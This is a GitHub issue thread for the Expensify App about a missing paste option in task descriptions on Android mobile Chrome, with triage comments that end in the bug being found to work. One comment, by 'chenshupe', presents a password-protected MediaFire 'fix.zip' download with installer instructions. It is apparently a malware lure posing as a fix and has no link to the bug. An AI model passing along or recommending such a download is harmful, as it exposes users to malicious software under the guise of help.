### ISSUE TITLE
[$250] mWeb – Task – Unable to paste part of copied description

### ISSUE THREAD

**Issue by IuliiaHerets** [Expensify/App#48157]
If you haven’t already, check out our [contributing guidelines](https://github.com/Expensify/ReactNativeChat/blob/main/contributingGuides/CONTRIBUTING.md) for onboarding and email contributors@expensify.com to request to join our Slack channel!
___

**Version Number:** v9.0.25-10
**Reproducible in staging?:** Y 
**Reproducible in production?:** N
**If this was caught during regression testing, add the test name, ID and link from TestRail:** https://expensify.testrail.io/index.php?/tests/view/4896675
**Email or phone of affected tester (no customers):** https://expensify.testrail.io/index.php?/tests/view/4896675
**Issue reported by:** Applause Internal Team

## Action Performed:
1. Go to https://staging.new.expensify.com/

2. Log in with Gmail account
3. Go to any chat
4. Tap on + Assign task
5. Enter task title
6. Enter any text to the description
7. Copy the text from the description using long press
8. Long press to paste copied text to the description

## Expected Result:
Able to paste copied text

## Actual Result:
Paste option is missing.
Unable to paste any text copied from app

## Workaround:
Unknown

## Platforms:

- [ ] Android: Native
- [x] Android: mWeb Chrome
- [ ] iOS: Native
- [ ] iOS: mWeb Safari
- [ ] MacOS: Chrome / Safari
- [ ] MacOS: Desktop

## Screenshots/Videos

https://github.com/user-attachments/assets/d8f9ac9b-509d-458d-9e15-412161a45f34

</details>

[View all open jobs on GitHub](https://github.com/Expensify/App/issues?q=is%3Aopen+is%3Aissue+label%3A%22Help+Wanted%22)

<details><summary>Upwork Automation - Do Not Edit</summary>
    <ul>
        <li>Upwork Job URL: https://www.upwork.com/jobs/~012db7e0613664b1bc</li>
        <li>Upwork Job ID: 1829212735967638792</li>
        <li>Last Price Increase: 2024-09-05</li>
    </ul>
</details>

<details><summary>Issue Owner</summary>Current Issue Owner: @rushatgabhane</details>

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kaushiktd** [comment]
@Julesssss @IuliiaHerets **Assign Task** option is not visible to our expensify login account

**Comment by Julesssss** [comment]
> @Julesssss @IuliiaHerets **Assign Task** option is not visible to our expensify login account

Hi, do you see this after entering a 1:1 user chat?

<img width="712" alt="Screenshot 2024-09-02 at 09 27 42" src="https://github.com/user-attachments/assets/aadce582-b1bb-4654-af77-c1b3ca401c2a">

**Comment by kaushiktd** [comment]
> > @Julesssss @IuliiaHerets **Assign Task** option is not visible to our expensify login account
> 
> Hi, do you see this after entering a 1:1 user chat?
> 
> <img alt="Screenshot 2024-09-02 at 09 27 42" width="712" src="https://private-user-images.githubusercontent.com/10736861/363616698-aadce582-b1bb-4654-af77-c1b3ca401c2a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUyNjU5NzIsIm5iZiI6MTcyNTI2NTY3MiwicGF0aCI6Ii8xMDczNjg2MS8zNjM2MTY2OTgtYWFkY2U1ODItYjFiYi00NjU0LWFmNzctYzFiM2NhNDAxYzJhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MDIlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTAyVDA4Mjc1MlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTYzZTVhY2Y4OGM5NzM5OTIzZmU0OTJmNjI1NTEyOTE3OTY3YjZiMmU4MmNmYjE5OGViZGNkYTdiNzMzMzlmOGEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.Pkswj3KAXHK9RvMVOFeP9hbQBOPPCiy0aEVca47wG7A">

Paste option is working on mWeb android

**Comment by adelekennedy** [comment]
@kaushiktd I cannot see your screenshot for some reason, can you take another?

**Comment by kaushiktd** [comment]
> @kaushiktd I cannot see your screenshot for some reason, can you take another?

You can see here:

https://github.com/user-attachments/assets/b56b45a1-e248-4bf5-b806-10c53ef99a6d

**Comment by Julesssss** [comment]
So this seems to be working for all. Please comment if this isn't the case
